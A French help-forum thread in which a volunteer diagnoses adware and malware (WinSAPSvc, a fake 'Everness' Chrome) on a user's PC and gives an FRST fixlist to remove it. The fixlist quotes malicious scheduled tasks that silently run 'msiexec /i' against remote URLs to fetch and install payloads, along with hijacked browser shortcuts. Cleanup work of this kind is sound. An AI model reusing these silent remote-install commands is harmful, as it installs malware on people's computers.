Virus WinSAPSvc et Everness Résolu/Fermé

Question

Bonjour, 

Ces derniers jours mon PC connait une lenteur anormale, je crois qu'il est infecté.

J'ai effectué hier un scan avec ZHPDiag. Vous trouverez ci-dessous le lien pour accéder à ce rapport:
http://www..com/c/GDEacJmSJIw

Je vous prie de m'aider le plutot possible car mon PC devient presque inutilisable.

Merci d'avance pour votre aide et assistance.

Malekal_morte- · Answer

Salut,

Pas de virus, à priori, plutôt des programmes inutiles qui ralentissent Windows.
Désinstalle YAC(Yet Another Cleaner! 

puis :

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 3 rapports FRST seront générés :

 FRST.txt
 Shortcut.txt
 Additionnal.txt

Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

dodda11 · Answer

Bonsoir Malekal,

Je te remercie beaucoup pour ton assistance.

J'ai désinstallé YAC(Yet Another Cleaner! et j'ai lancé le scan FRST. 

Merci de trouver les rapports générés dans les liens ci-dessous:

• FRST.txt  :  https://pjjoint.malekal.com/files.php?id=FRST_20170501_u9t10q13s11u9

• Shortcut.txt : https://pjjoint.malekal.com/files.php?id=20170501_j11o7h11l12c15

• Additionnal.txt :  https://pjjoint.malekal.com/files.php?id=20170501_h5u13b10s14m15

Merci,

Malekal_morte- · Answer

En fait, l'ordinateur est infecté =) Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran. Ouvre le bloc-notes : Touche Windows + R, Dans le champs "Exécuter", saisir notepad et OK. Copie/Colle dedans ce qui suit : CreateRestorePoint:CloseProcesses:Task: {1B451D2E-B6D9-4374-8942-94158CDE6CA0} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=ST9320423AS_5VJ9J9JT&d=20170426 /q <==== ATTENTIONTask: {4A38B675-8E94-4AD9-9EB4-6D83F74E3AF7} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /qTask: {C5959D44-60BA-4F84-821B-2AC157388AD4} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-04-28] () <==== ATTENTIONShortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)ShortcutWithArgument: C:\Users\Moumni Bros\Desktop\ALL\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.bahaty.com/red/e.phpShortcutWithArgument: C:\Users\Moumni Bros\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\cfa384dbd06217b1\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultDataShortcutWithArgument: C:\Users\Moumni Bros\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData ShellExecuteHooks: Pas de nom - {EB57AAF0-235E-11E7-8087-64006A5CFC23} - C:\Users\Moumni Bros\AppData\Roaming\Atawerward\Zobalebueent.dll -> Pas de fichier CHR Extension: (Visiteurs pour Facebook) - C:\Users\Moumni Bros\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihjbpjahiibmjdlcgodcnmpelpmilamk [2017-02-15]R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-27] () <==== ATTENTION R2 HPSLPSVC; C:\Users\Moumni Bros\AppData\Local\Temp\7zS1010\hpslpsvc64.dll [1039360 2015-09-21] (Hewlett-Packard Co.) [Fichier non signé] <==== ATTENTION R2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [108544 2017-04-26] () [Fichier non signé] HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) <==== ATTENTION HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) <==== ATTENTION S4 WinSAPSvc; C:\Users\Moumni Bros\AppData\Roaming\WinSAPSvc\WinSAP.dll [550912 2017-04-29] () [Fichier non signé] <==== ATTENTION 2017-04-27 22:07 - 2017-04-27 22:07 - 00000000 ____D C:\Users\Moumni Bros\AppData\Roaming\Firefox 2017-04-27 22:07 - 2017-04-27 22:07 - 00000000 ____D C:\Users\Moumni Bros\AppData\Local\Firefox 2017-04-27 22:05 - 2017-04-27 22:05 - 00000000 ____D C:\Users\Moumni Bros\AppData\Local\Everness 2017-04-27 22:05 - 2017-04-27 22:05 - 00000000 ____D C:\ProgramData\Apple 2017-04-27 22:05 - 2017-04-27 22:05 - 00000000 ____D C:\Program Files (x86)\Firefox 2017-04-27 22:05 - 2017-04-27 22:05 - 00000000 ____D C:\Program Files (x86)\Everness 2017-04-27 13:21 - 2017-04-27 13:21 - 00003480 _____ C:\WINDOWS\System32\Tasks\T0528 2017-04-27 13:16 - 2017-04-27 13:16 - 00000000 ____D C:\WINDOWS\system32\log 2017-04-27 13:16 - 2016-05-23 03:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys 2017-04-27 13:16 - 2016-05-19 07:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys 2017-04-27 13:15 - 2017-05-01 00:20 - 00000000 _____ C:\Users\Public\Documents eport.dat 2017-04-27 13:15 - 2017-05-01 00:00 - 00000299 _____ C:\Users\Public\Documents emp.dat 2017-04-27 13:15 - 2017-04-27 13:15 - 00000000 _____ C:\WINDOWS\SysWOW64\22 2017-04-27 13:15 - 2017-04-27 13:15 - 00000000 _____ C:\WINDOWS\SysWOW64\11 2017-04-26 12:47 - 2017-04-26 12:47 - 00003948 _____ C:\WINDOWS\System32\Tasks\Samsung Update 2017-04-26 12:47 - 2017-04-26 12:47 - 00000000 ____D C:\Insist 2017-04-25 12:58 - 2017-04-27 12:57 - 00000000 _____ C:\WINDOWS\SysWOW64\1 2017-04-25 12:47 - 2017-04-28 12:55 - 00003566 _____ C:\WINDOWS\System32\Tasks\Milimili 2017-04-25 12:47 - 2017-04-28 12:55 - 00003516 _____ C:\WINDOWS\System32\Tasks\Windows-PG 2017-04-25 12:47 - 2017-04-28 12:55 - 00000000 ____D C:\Users\Moumni Bros\AppData\Local\SNARE 2017-04-25 12:47 - 2017-04-25 12:47 - 00000000 ____D C:\WINDOWS\psgo 2017-04-25 12:47 - 2017-04-25 12:47 - 00000000 ____D C:\Users\Moumni Bros\AppData\Local\Kitty 2017-04-25 12:47 - 2017-04-25 12:47 - 00000000 ____D C:\Program Files (x86)\MIO 2017-04-25 12:46 - 2017-04-28 13:00 - 00000000 ____D C:\Users\Moumni Bros\AppData\Roaming\WinSAPSvc 2017-04-25 12:45 - 2017-04-28 12:54 - 00000000 ____D C:\Program Files\MK 2017-04-25 12:45 - 2017-04-25 12:45 - 00000000 ____D C:\Program Files (x86)\eg0f32gu 2017-04-25 00:23 - 2017-04-29 12:44 - 00005622 _____ C:\ProgramData\log.ewbt 2017-04-25 00:23 - 2017-04-29 12:44 - 00000128 _____ C:\ProgramData\log.ewbb 2017-04-25 00:23 - 2017-04-28 13:00 - 00000000 ____D C:\Program Files (x86)\Rasupy 2017-04-25 00:23 - 2017-04-27 21:59 - 00000000 ____D C:\Users\Moumni Bros\AppData\Roaming\Atawerward 2017-04-25 00:23 - 2017-04-25 00:26 - 00000000 ____D C:\Users\Moumni Bros\AppData\Local\Kehige 2017-04-25 00:23 - 2017-04-25 00:23 - 00006012 _____ C:\WINDOWS\System32\Tasks\Gacekzapry System 2017-04-25 00:23 - 2017-04-25 00:23 - 00005984 _____ C:\WINDOWS\System32\Tasks\Mmersh 2017-04-25 00:23 - 2017-04-25 00:23 - 00000000 ____D C:\Program Files (x86)\Gacekzapry System 2017-04-25 00:17 - 2017-04-30 12:06 - 00000000 ____D C:\Users\Moumni Bros\AppData\LocalLow\Mozilla 2017-04-25 00:13 - 2017-04-25 00:13 - 00000000 ____D C:\Users\Moumni Bros\licman 2017-04-25 00:13 - 2017-04-25 00:13 - 00000000 ____D C:\Users\Moumni Bros\ERHome64 Hosts:EmptyTemp:RemoveProxy:Reboot: Une fois, le texte collé dans le Bloc-notes, Menu "Fichier" puis "Enregistrer sous", A gauche, place toi sur le Bureau, Dans le champs en bas, nom du fichier mets : fixlist.txt Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau. Relance FRST et clique sur le bouton "Corriger / Fix" Un redémarrage sera peut-être nécessaire ( pas obligatoire ) Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message. Redémarre l'ordinateur. 2°) Réinitialise/Répare les navigateurs WEB concernés par les problèmes : Réparer Mozilla Firefox (premier paragraphe) Réparer Google Chrome (seulement le premier paragraphe). Réinitialiser et réparer Internet Explorer 3°) Fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite 4°) Si tu as des problèmes de pubs et autres, indique sur quel navigateur WEB. Refais un scan FRST et donne les rapports via pjjoint.

dodda11 · Answer

Bonjour,

Merci beaucoup pour ton assistance. 

J'ai effectué toutes les étapes demandées et mon ordinateur va mieux maintenant :D

Merci de trouver ci dessous les rapports du scan FRST:
- FRST : https://pjjoint.malekal.com/files.php?id=FRST_20170501_w6o12o15o10e10

- Additionnal: https://pjjoint.malekal.com/files.php?id=20170501_f9d8i8b7f6

- Shortcut: https://pjjoint.malekal.com/files.php?id=20170501_m9i10b10l14r14

Merci,

Malekal_morte- · Answer

super,
à supprimer : C:\ProgramData\RegisterObject 

Supprime le dossier C:\FRST


Termine par un nettoyage Malwarebytes -  Tutoriel Malwarebytes Anti-Malware version gratuite 


Quelques conseils : 

Pour ne plus te faire avoir. 
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)

Virus WinSAPSvc et Everness

5 réponses

Discussions similaires